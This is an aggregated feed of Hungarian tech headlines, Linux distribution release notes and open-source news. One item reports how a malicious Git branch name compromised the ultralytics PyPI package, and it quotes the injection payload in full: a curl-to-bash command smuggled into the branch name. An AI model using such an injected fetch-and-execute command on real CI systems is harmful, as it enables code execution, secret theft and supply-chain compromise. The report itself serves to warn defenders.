"Ez aztán az újítás: állampapír-csere funkciót kap a lakosság"
"Ez aztán az újítás: állampapír-csere funkciót kap a lakosság"
trey
2024. 12. 07., szo – 10:26
Hírolvasó
Negatívról stabilra javította Magyarország adósbesorolásához tartozó kilátást a Fitch Ratings
Negatívról stabilra javította Magyarország adósbesorolásához tartozó kilátást a Fitch Ratings
trey
2024. 12. 07., szo – 09:35
07/18 Calculate 20240716
Calculate Linux is a Gentoo-based family of three distinguished distributions. Calculate Directory Server (CDS) is a solution that supports Windows and Linux clients via LDAP + SAMBA, providing proxy, mail and Jabbers servers with streamlined user management. Calculate Linux Desktop (CLD) is a workstation and client distribution (with a choice of Cinnamon, KDE Plasma, LXQt, MATE or Xfce desktops) that includes a wizard to configure a connection to Calculate Directory Server. Calculate Linux Scratch (CLS) is a live CD with a build framework for creating a custom distribution.
Abusing Git branch names to compromise a PyPI package
A compromised release was uploaded to PyPI after a project automatically processed a pull request with a flawed script. The GitHub account "OpenIM Robot" (which appears to be controlled by Xinwei Xiong) opened a pull request for the ultralytics Python package. The pull request included a suspicious Git branch name:
openimbot:$({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/12e4f54ca3f2e69bcdc900d1c6e16642ca8ae545/file.sh}${IFS}|${IFS}bash)Unfortunately, ultralytics uses the pull_request_target GitHub Action trigger to automate some of its continuous-integration tasks. This runs a script from the base branch of the repository, which has access to the repository's secrets — but that script was vulnerable to a shell injection attack from the branch name of the pull request. The injected script appears to have used the credentials it had access to in order to compromise a later release uploaded to PyPI to include a cryptocurrency miner. It is hard to be sure of the details, because GitHub has already removed the malicious script.
This problem has been known for several years, but this event may serve as a good reminder to be careful with automated access to important secrets.
A single stable kernel to fix boot problems
Greg Kroah-Hartman released version 6.12.3 of the kernel to fix a regression that can cause some machines to fail to boot on version 6.12.2. The other stable branches are continuing on their normal cadence, with 6.12.4-rc1 and 6.6.64-rc1 starting review today.
[$] Freezing out the page reference count
The page
structure sits at the core of the kernel's memory-management subsystem
(for now), and a key part of that structure is its reference count, stored
in refcount. The page reference count tells the kernel how many
users a given page has and when it can be freed. That count is not needed
for every page in the system, though. Matthew Wilcox has recently resurrected
an old
patch set that expands the concept of a "frozen" page — one that lacks a
meaningful reference count — to the immediate benefit of the slab allocator
but in the service of a longer-term goal as well.
Security updates for Friday
Security updates have been issued by AlmaLinux (firefox, postgresql, postgresql:12, postgresql:13, postgresql:15, postgresql:16, python3:3.6.8, and thunderbird), Debian (clamav), Fedora (pam), Red Hat (firefox, postgresql:13, postgresql:15, python-tornado, redis:7, ruby, ruby:2.5, and ruby:3.1), SUSE (avahi, docker-stable, java-1_8_0-openjdk, libmozjs-128-0, obs-scm-bridge, php8, and teleport), and Ubuntu (ghostscript, needrestart, and shiro).
Ez ám a bonyolult feladvány! 😅
Ez ám a bonyolult feladvány! 😅
trey
2024. 12. 06., p – 14:57
AI-jal generált értékelések jöhetnek a Google Chrome-ba
A weboldalak reputációját értékelő funkciót tesztel a Google Chrome, aminek az alapját a generatív mesterséges intelligencia adja.
További két évig kapnak OS-frissítést a Pixel 6 és 7 okostelefonok
Azért a Pixel 8 szintjét még nem hozza a Google, de ki ne örülne egy ilyen visszamenőleges döntésnek?
A mobiltelefonok címkézését kérték a spanyol kormánytól
A szakértők azt javasolják a helyi kormánynak, hogy foglalkozzon szigorúbban a mobilfüggőséggel.
Tabu lett a román elnökválasztás a TikTok számára
A közösségi szolgáltatás a romániai elnökválasztás második fordulójának idején minden politikai tartalmat el kell némítson.
Linus-on nem segített az átnevelési kísérlet #1
Linus-on nem segített az átnevelési kísérlet #1
trey
2024. 12. 06., p – 12:00
Drága előfizetéssel újít a ChatGPT
Elérhetővé vált a ChatGPT Pro szint, ami tízszer drágább, mint a Plus csomag.
Helyben gyártatná az Nvidia a Blackwellt
A kész chipeknek ettől függetlenül lehet egy útjuk Tajvanba és vissza.
"„Falnak csapom a kibaszott fejedet” – Verstappen megfenyegette riválisát"
"„Falnak csapom a kibaszott fejedet” – Verstappen megfenyegette riválisát"
trey
2024. 12. 06., p – 10:14
"Orbán Balázs védése: autoriter liberalizmus az akadémiai szabadság ellen"
"Orbán Balázs védése: autoriter liberalizmus az akadémiai szabadság ellen"
trey
2024. 12. 06., p – 07:38
Apertis v2024 released
Apertis is a Collabora-developed
Debian derivative distribution designed to be incorporated into electronic
devices; the v2024
release is now available. It is now based on the Bookworm release, and
includes support for Podman, ONNX
Runtime, OP-TEE, and more.
Apertis relies on the Debian Free Software Guidelines to ensure all software shipped is open source or, in limited cases, at least freely distributable. However, for some customers this is not enough to be able to adopt OSS solutions as in their evaluations some provisions in common licenses like the GPL-3 are at odds with regulatory constraints they are subject to. Apertis does not set to solve this decades-long debate, and instead its goal is to increase the adoption of modern, maintained OSS solutions in markets where this has historically been a challenge. To enable this, Apertis supports avoiding the use of any software under some licenses (like the [GPL v3.0 license family) on target images, while still making them fully available for development and for customers that do not share those licensing concerns. To avoid these licenses, Apertis uses more modern alternatives instead of relying on outdated and unmaintained pre-GPL-3 versions. For instance, coreutils and findutils (GPL-3+) are replaced in Apertis by rust-coreutils and rust-findutils.
06/12 openSUSE 15.6
The openSUSE project is a community program sponsored by SUSE Linux and other companies. Promoting the use of Linux everywhere, this program provides free, easy access to openSUSE, a complete Linux distribution. The openSUSE project has three main goals: make openSUSE the easiest Linux for anyone to obtain and the most widely used Linux distribution; leverage open source collaboration to make openSUSE the world's most usable Linux distribution and desktop environment for new and experienced Linux users; dramatically simplify and open the development and packaging processes to make openSUSE the platform of choice for Linux developers and software vendors. NOTE: If you are looking for SUSE Linux Enterprise products please visit the SLE page.
06/12 AUSTRUMI 4.9.5
AUSTRUMI (Austrum Latvijas Linukss) is a bootable live Linux distribution based on Slackware Linux. It requires limited system resources and can run on any Intel-compatible system with a CD-ROM installed. The entire operating system and all of the applications run from RAM, making AUSTRUMI a fast system and allowing the boot medium to be removed after the operating system starts.